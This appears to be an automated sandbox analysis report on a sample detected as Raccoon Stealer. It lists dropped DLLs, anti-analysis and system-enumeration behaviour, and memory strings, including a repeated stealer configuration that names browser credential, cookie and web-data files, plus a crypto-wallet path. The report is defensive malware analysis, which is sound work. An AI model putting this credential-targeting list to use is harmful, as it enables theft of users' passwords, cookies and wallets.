Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-1.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-memory-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-math-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-time-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\breakpadinjector.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-interlocked-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nss3.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-namedpipe-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-environment-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-string-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-process-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-stdio-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-sysinfo-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-localization-l1-2-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-rtlsupport-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-profile-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldap60.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldif60.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processenvironment-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-runtime-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-timezone-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-2-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-heap-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-filesystem-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sqlite3.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-multibyte-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-util-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-string-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll			Jump to dropped file

Is looking for software installed on the system

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Queries a list of all running processes

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to query system information

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Code function: 0_2_001F7819 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,

0_2_001F7819

Contains functionality to enumerate / list files inside a directory

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Code function: 0_2_001FEFDD FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,

0_2_001FEFDD

Enumerates the file system

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\			Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: eLZzxG56uH.exe, 00000000.00000002.314134323.00000000016DE000.00000004.00000020.sdmp

Binary or memory string: Hyper-V RAW

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Code function: 0_2_0021C559 IsDebuggerPresent,OutputDebugStringW,

0_2_0021C559

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Code function: 0_2_001F49A2 LoadLibraryA,GetProcAddress,FreeLibrary,

0_2_001F49A2

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_0021A03D mov eax, dword ptr fs:[00000030h]		0_2_0021A03D
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_0021A0B2 mov eax, dword ptr fs:[00000030h]		0_2_0021A0B2
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_0021A081 mov eax, dword ptr fs:[00000030h]		0_2_0021A081
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_00206C01 mov eax, dword ptr fs:[00000030h]		0_2_00206C01

Contains functionality to register its own exception handler

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_00206625 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00206625
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_00200EDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_00200EDC

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK

Jump to behavior

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,		0_2_001F7819
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: GetLocaleInfoW,		0_2_002229F7
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,		0_2_00222B1D
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: GetLocaleInfoW,		0_2_00218BA4
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,		0_2_00222391
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: GetLocaleInfoW,		0_2_00222C23
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,		0_2_00222CF2
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: EnumSystemLocalesW,		0_2_00218577
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: GetLocaleInfoW,		0_2_0022258C
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: EnumSystemLocalesW,		0_2_00222633
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: EnumSystemLocalesW,		0_2_0022267E
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: EnumSystemLocalesW,		0_2_00222719

Queries the cryptographic machine GUID

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Contains functionality to query local / system time

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Code function: 0_2_001FE03E GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

0_2_001FE03E

Contains functionality to query time zone information

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Code function: 0_2_001F71FA __EH_prolog,GetUserNameA,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor,

0_2_001F71FA

Contains functionality to query windows version

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Code function: 0_2_001EA2F9 GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary,

0_2_001EA2F9

Contains functionality to query the account / user name

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Code function: 0_2_001F7819 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,

0_2_001F7819

Stealing of Sensitive Information:

Yara detected Raccoon Stealer

Source: Yara match	File source: 0.2.eLZzxG56uH.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: eLZzxG56uH.exe PID: 3340, type: MEMORYSTR

Contains functionality to steal Internet Explorer form passwords

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Code function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2

0_2_001F592B

Found many strings related to Crypto-Wallets (likely being stolen)

Source: eLZzxG56uH.exe, 00000000.00000002.314083739.00000000016B1000.00000004.00000020.sdmp	String found in binary or memory: {"_id":"-pEuK3wB3dP17SpzG6pB","au":"/l/f/-pEuK3wB3dP17SpzG6pB/21cbbf099c71cc43b2b903c1329c99a4ee8b02a9","ls":"/l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6f","ip":"84.17.52.39","location":{"country":"Switzerland","country_code":"CH","state":"Zurich","state_code":"ZH","city":"Zurich","zip":8152,"latitude":47.4317,"longitude":8.5759},"c":{"m":null,"t":null,"lu":null},"lu":null,"rm":1,"is_screen_enabled":1,"is_history_enabled":0,"depth":3,"s":[{"k":"edge","v":"28;Microsoft Edge;\\Microsoft\\Edge\\User Data;Login Data;Cookies;Web Data"},{"k":"chrome","v":"28;Google Chrome;\\Google\\Chrome\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeBeta","v":"28;Google Chrome Beta;\\Google\\Chrome Beta\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeSxS","v":"28;Google Chrome SxS;\\Google\\Chrome SxS\\User Data;Login Data;Cookies;Web Data"},{"k":"chromium","v":"28;Chromium;\\Chromium\\User Data;Login Data;Cookies;Web Data"},{"k":"xpom","v":"28;Xpom;\\Xpom\\User Data;Login Data;Cookies;Web Data"},{"k":"comodo","v":"28;Comodo Dragon;\\Comodo\\Dragon\\User Data;Login Data;Cookies;Web Data"},{"k":"amigo","v":"28;Amigo;\\Amigo\\User Data;Login Data;Cookies;Web Data"},{"k":"orbitum","v":"28;Orbitum;\\Orbitum\\User Data;Login Data;Cookies;Web Data"},{"k":"bromium","v":"28;Bromium;\\Bromium\\User Data;Login Data;Cookies;Web Data"},{"k":"brave","v":"28;Brave;\\BraveSoftware\\Brave-Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"nichrome","v":"28;Nichrome;\\Nichrome\\User Data;Login Data;Cookies;Web Data"},{"k":"rockmelt","v":"28;RockMelt;\\RockMelt\\User Data;Login Data;Cookies;Web Data"},{"k":"360browser","v":"28;360Browser;\\360Browser\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"vivaldi","v":"28;Vivaldi;\\Vivaldi\\User Data;Login Data;Cookies;Web Data"},{"k":"go","v":"28;Go;\\Go!\\User Data;Login Data;Cookies;Web Data"},{"k":"sputnik","v":"28;Sputnik;\\Sputnik\\Sputnik\\User Data;Login Data;Cookies;Web Data"},{"k":"kometa","v":"28;Kometa;\\Kometa\\User Data;Login Data;Cookies;Web Data"},{"k":"uran","v":"28;Uran;\\uCozMedia\\Uran\\User Data;Login Data;Cookies;Web Data"},{"k":"qipSurf","v":"28;QIP Surf;\\QIP Surf\\User Data;Login Data;Cookies;Web Data"},{"k":"epicprivacy","v":"28;Epic Privacy;\\Epic Privacy Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"coccoc","v":"28;CocCoc;\\CocCoc\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"centbrowser","v":"28;CentBrowser;\\CentBrowser\\User Data;Login Data;Cookies;Web Data"},{"k":"7star","v":"28;7Star;\\7Star\\7Star\\User Data;Login Data;Cookies;Web Data"},{"k":"elements","v":"28;Elements;\\Elements Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"torbro","v":"28;TorBro;\\TorBro\\Profile;Login Data;Cookies;Web Data"},{"k":"suhba","v":"28;Suhba;\\Suhba\\User Data;Login Data;Cookies;Web Data"},{"k":"saferbrowser","v":"28;Safer Browser;\\Safer Technologies\\Secure Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"mustang","v":"28;Mustang;\\Rafotech\\Mustang
Source: eLZzxG56uH.exe, 00000000.00000002.314083739.00000000016B1000.00000004.00000020.sdmp	String found in binary or memory: {"_id":"-pEuK3wB3dP17SpzG6pB","au":"/l/f/-pEuK3wB3dP17SpzG6pB/21cbbf099c71cc43b2b903c1329c99a4ee8b02a9","ls":"/l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6f","ip":"84.17.52.39","location":{"country":"Switzerland","country_code":"CH","state":"Zurich","state_code":"ZH","city":"Zurich","zip":8152,"latitude":47.4317,"longitude":8.5759},"c":{"m":null,"t":null,"lu":null},"lu":null,"rm":1,"is_screen_enabled":1,"is_history_enabled":0,"depth":3,"s":[{"k":"edge","v":"28;Microsoft Edge;\\Microsoft\\Edge\\User Data;Login Data;Cookies;Web Data"},{"k":"chrome","v":"28;Google Chrome;\\Google\\Chrome\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeBeta","v":"28;Google Chrome Beta;\\Google\\Chrome Beta\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeSxS","v":"28;Google Chrome SxS;\\Google\\Chrome SxS\\User Data;Login Data;Cookies;Web Data"},{"k":"chromium","v":"28;Chromium;\\Chromium\\User Data;Login Data;Cookies;Web Data"},{"k":"xpom","v":"28;Xpom;\\Xpom\\User Data;Login Data;Cookies;Web Data"},{"k":"comodo","v":"28;Comodo Dragon;\\Comodo\\Dragon\\User Data;Login Data;Cookies;Web Data"},{"k":"amigo","v":"28;Amigo;\\Amigo\\User Data;Login Data;Cookies;Web Data"},{"k":"orbitum","v":"28;Orbitum;\\Orbitum\\User Data;Login Data;Cookies;Web Data"},{"k":"bromium","v":"28;Bromium;\\Bromium\\User Data;Login Data;Cookies;Web Data"},{"k":"brave","v":"28;Brave;\\BraveSoftware\\Brave-Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"nichrome","v":"28;Nichrome;\\Nichrome\\User Data;Login Data;Cookies;Web Data"},{"k":"rockmelt","v":"28;RockMelt;\\RockMelt\\User Data;Login Data;Cookies;Web Data"},{"k":"360browser","v":"28;360Browser;\\360Browser\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"vivaldi","v":"28;Vivaldi;\\Vivaldi\\User Data;Login Data;Cookies;Web Data"},{"k":"go","v":"28;Go;\\Go!\\User Data;Login Data;Cookies;Web Data"},{"k":"sputnik","v":"28;Sputnik;\\Sputnik\\Sputnik\\User Data;Login Data;Cookies;Web Data"},{"k":"kometa","v":"28;Kometa;\\Kometa\\User Data;Login Data;Cookies;Web Data"},{"k":"uran","v":"28;Uran;\\uCozMedia\\Uran\\User Data;Login Data;Cookies;Web Data"},{"k":"qipSurf","v":"28;QIP Surf;\\QIP Surf\\User Data;Login Data;Cookies;Web Data"},{"k":"epicprivacy","v":"28;Epic Privacy;\\Epic Privacy Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"coccoc","v":"28;CocCoc;\\CocCoc\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"centbrowser","v":"28;CentBrowser;\\CentBrowser\\User Data;Login Data;Cookies;Web Data"},{"k":"7star","v":"28;7Star;\\7Star\\7Star\\User Data;Login Data;Cookies;Web Data"},{"k":"elements","v":"28;Elements;\\Elements Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"torbro","v":"28;TorBro;\\TorBro\\Profile;Login Data;Cookies;Web Data"},{"k":"suhba","v":"28;Suhba;\\Suhba\\User Data;Login Data;Cookies;Web Data"},{"k":"saferbrowser","v":"28;Safer Browser;\\Safer Technologies\\Secure Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"mustang","v":"28;Mustang;\\Rafotech\\Mustang
Source: eLZzxG56uH.exe, 00000000.00000002.314083739.00000000016B1000.00000004.00000020.sdmp	String found in binary or memory: {"_id":"-pEuK3wB3dP17SpzG6pB","au":"/l/f/-pEuK3wB3dP17SpzG6pB/21cbbf099c71cc43b2b903c1329c99a4ee8b02a9","ls":"/l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6f","ip":"84.17.52.39","location":{"country":"Switzerland","country_code":"CH","state":"Zurich","state_code":"ZH","city":"Zurich","zip":8152,"latitude":47.4317,"longitude":8.5759},"c":{"m":null,"t":null,"lu":null},"lu":null,"rm":1,"is_screen_enabled":1,"is_history_enabled":0,"depth":3,"s":[{"k":"edge","v":"28;Microsoft Edge;\\Microsoft\\Edge\\User Data;Login Data;Cookies;Web Data"},{"k":"chrome","v":"28;Google Chrome;\\Google\\Chrome\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeBeta","v":"28;Google Chrome Beta;\\Google\\Chrome Beta\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeSxS","v":"28;Google Chrome SxS;\\Google\\Chrome SxS\\User Data;Login Data;Cookies;Web Data"},{"k":"chromium","v":"28;Chromium;\\Chromium\\User Data;Login Data;Cookies;Web Data"},{"k":"xpom","v":"28;Xpom;\\Xpom\\User Data;Login Data;Cookies;Web Data"},{"k":"comodo","v":"28;Comodo Dragon;\\Comodo\\Dragon\\User Data;Login Data;Cookies;Web Data"},{"k":"amigo","v":"28;Amigo;\\Amigo\\User Data;Login Data;Cookies;Web Data"},{"k":"orbitum","v":"28;Orbitum;\\Orbitum\\User Data;Login Data;Cookies;Web Data"},{"k":"bromium","v":"28;Bromium;\\Bromium\\User Data;Login Data;Cookies;Web Data"},{"k":"brave","v":"28;Brave;\\BraveSoftware\\Brave-Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"nichrome","v":"28;Nichrome;\\Nichrome\\User Data;Login Data;Cookies;Web Data"},{"k":"rockmelt","v":"28;RockMelt;\\RockMelt\\User Data;Login Data;Cookies;Web Data"},{"k":"360browser","v":"28;360Browser;\\360Browser\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"vivaldi","v":"28;Vivaldi;\\Vivaldi\\User Data;Login Data;Cookies;Web Data"},{"k":"go","v":"28;Go;\\Go!\\User Data;Login Data;Cookies;Web Data"},{"k":"sputnik","v":"28;Sputnik;\\Sputnik\\Sputnik\\User Data;Login Data;Cookies;Web Data"},{"k":"kometa","v":"28;Kometa;\\Kometa\\User Data;Login Data;Cookies;Web Data"},{"k":"uran","v":"28;Uran;\\uCozMedia\\Uran\\User Data;Login Data;Cookies;Web Data"},{"k":"qipSurf","v":"28;QIP Surf;\\QIP Surf\\User Data;Login Data;Cookies;Web Data"},{"k":"epicprivacy","v":"28;Epic Privacy;\\Epic Privacy Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"coccoc","v":"28;CocCoc;\\CocCoc\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"centbrowser","v":"28;CentBrowser;\\CentBrowser\\User Data;Login Data;Cookies;Web Data"},{"k":"7star","v":"28;7Star;\\7Star\\7Star\\User Data;Login Data;Cookies;Web Data"},{"k":"elements","v":"28;Elements;\\Elements Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"torbro","v":"28;TorBro;\\TorBro\\Profile;Login Data;Cookies;Web Data"},{"k":"suhba","v":"28;Suhba;\\Suhba\\User Data;Login Data;Cookies;Web Data"},{"k":"saferbrowser","v":"28;Safer Browser;\\Safer Technologies\\Secure Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"mustang","v":"28;Mustang;\\Rafotech\\Mustang
Source: eLZzxG56uH.exe, 00000000.00000002.314121729.00000000016D2000.00000004.00000020.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: eLZzxG56uH.exe, 00000000.00000002.314083739.00000000016B1000.00000004.00000020.sdmp	String found in binary or memory: {"_id":"-pEuK3wB3dP17SpzG6pB","au":"/l/f/-pEuK3wB3dP17SpzG6pB/21cbbf099c71cc43b2b903c1329c99a4ee8b02a9","ls":"/l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6f","ip":"84.17.52.39","location":{"country":"Switzerland","country_code":"CH","state":"Zurich","state_code":"ZH","city":"Zurich","zip":8152,"latitude":47.4317,"longitude":8.5759},"c":{"m":null,"t":null,"lu":null},"lu":null,"rm":1,"is_screen_enabled":1,"is_history_enabled":0,"depth":3,"s":[{"k":"edge","v":"28;Microsoft Edge;\\Microsoft\\Edge\\User Data;Login Data;Cookies;Web Data"},{"k":"chrome","v":"28;Google Chrome;\\Google\\Chrome\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeBeta","v":"28;Google Chrome Beta;\\Google\\Chrome Beta\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeSxS","v":"28;Google Chrome SxS;\\Google\\Chrome SxS\\User Data;Login Data;Cookies;Web Data"},{"k":"chromium","v":"28;Chromium;\\Chromium\\User Data;Login Data;Cookies;Web Data"},{"k":"xpom","v":"28;Xpom;\\Xpom\\User Data;Login Data;Cookies;Web Data"},{"k":"comodo","v":"28;Comodo Dragon;\\Comodo\\Dragon\\User Data;Login Data;Cookies;Web Data"},{"k":"amigo","v":"28;Amigo;\\Amigo\\User Data;Login Data;Cookies;Web Data"},{"k":"orbitum","v":"28;Orbitum;\\Orbitum\\User Data;Login Data;Cookies;Web Data"},{"k":"bromium","v":"28;Bromium;\\Bromium\\User Data;Login Data;Cookies;Web Data"},{"k":"brave","v":"28;Brave;\\BraveSoftware\\Brave-Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"nichrome","v":"28;Nichrome;\\Nichrome\\User Data;Login Data;Cookies;Web Data"},{"k":"rockmelt","v":"28;RockMelt;\\RockMelt\\User Data;Login Data;Cookies;Web Data"},{"k":"360browser","v":"28;360Browser;\\360Browser\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"vivaldi","v":"28;Vivaldi;\\Vivaldi\\User Data;Login Data;Cookies;Web 